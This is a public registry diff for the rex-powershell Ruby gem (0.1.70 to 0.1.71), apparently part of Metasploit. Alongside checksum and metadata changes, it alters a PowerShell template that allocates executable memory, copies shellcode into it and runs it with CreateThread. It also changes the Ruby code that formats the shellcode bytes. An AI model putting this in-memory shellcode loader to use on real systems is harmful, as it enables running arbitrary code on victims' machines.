rex-powershell 0.1.70 → 0.1.71
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/data/templates/to_mem_old.ps1.template +1 -5
- data/lib/rex/powershell/script.rb +1 -5
- data/lib/rex/powershell/version.rb +1 -1
- metadata +2 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA1:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 3913c3cb269688b4aa91f076b92a5c8be40d6d2d
|
|
4
|
+
data.tar.gz: e9b641b0d6e95afc83c586f557bde88b6debc69d
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: d2dbc7886054eedff5a4992a6877da7eb8f64ce9f1dc60ee2be73c810584c831f9b4a0d0431590711b17990c8dcd72e3ca7f2caf9014fb993f85b922a439e5a5
|
|
7
|
+
data.tar.gz: cd9097d4897ca80bb455b1e74b44882864bf986b81ed2b03af53c31ab306e93cd6c8513bfca13244ffc2f7884af3f1a3a4ac6779ef0bc5891baf2606a659ef09
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
|
@@ -3,8 +3,6 @@ $%{var_syscode} = @"
|
|
|
3
3
|
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
|
4
4
|
[DllImport("kernel32.dll")]
|
|
5
5
|
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
|
6
|
-
[DllImport("msvcrt.dll")]
|
|
7
|
-
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
|
|
8
6
|
"@
|
|
9
7
|
|
|
10
8
|
$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
|
|
@@ -13,8 +11,6 @@ $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -n
|
|
|
13
11
|
|
|
14
12
|
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
|
|
15
13
|
|
|
16
|
-
|
|
17
|
-
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
|
|
18
|
-
}
|
|
14
|
+
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code},0,$%{var_rwx},$%{var_code}.Length)
|
|
19
15
|
|
|
20
16
|
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
|
|
@@ -75,11 +75,7 @@ module Powershell
|
|
|
75
75
|
psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
|
|
76
76
|
lines = []
|
|
77
77
|
1.upto(code.length - 1) do |byte|
|
|
78
|
-
|
|
79
|
-
lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
|
|
80
|
-
else
|
|
81
|
-
lines.push ",0x#{code[byte].to_s(16)}"
|
|
82
|
-
end
|
|
78
|
+
lines.push ",0x#{code[byte].to_s(16)}"
|
|
83
79
|
end
|
|
84
80
|
|
|
85
81
|
psh << lines.join('') + "\r\n"
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: rex-powershell
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.1.
|
|
4
|
+
version: 0.1.71
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- David 'thelightcosine' Maloney
|
|
@@ -88,7 +88,7 @@ cert_chain:
|
|
|
88
88
|
G+Hmcg1v810agasPdoydE0RTVZgEOOMoQ07qu7JFXVWZ9ZQpHT7qJATWL/b2csFG
|
|
89
89
|
8mVuTXnyJOKRJA==
|
|
90
90
|
-----END CERTIFICATE-----
|
|
91
|
-
date: 2017-04-
|
|
91
|
+
date: 2017-04-26 00:00:00.000000000 Z
|
|
92
92
|
dependencies:
|
|
93
93
|
- !ruby/object:Gem::Dependency
|
|
94
94
|
name: bundler
|
metadata.gz.sig
CHANGED
|
Binary file
|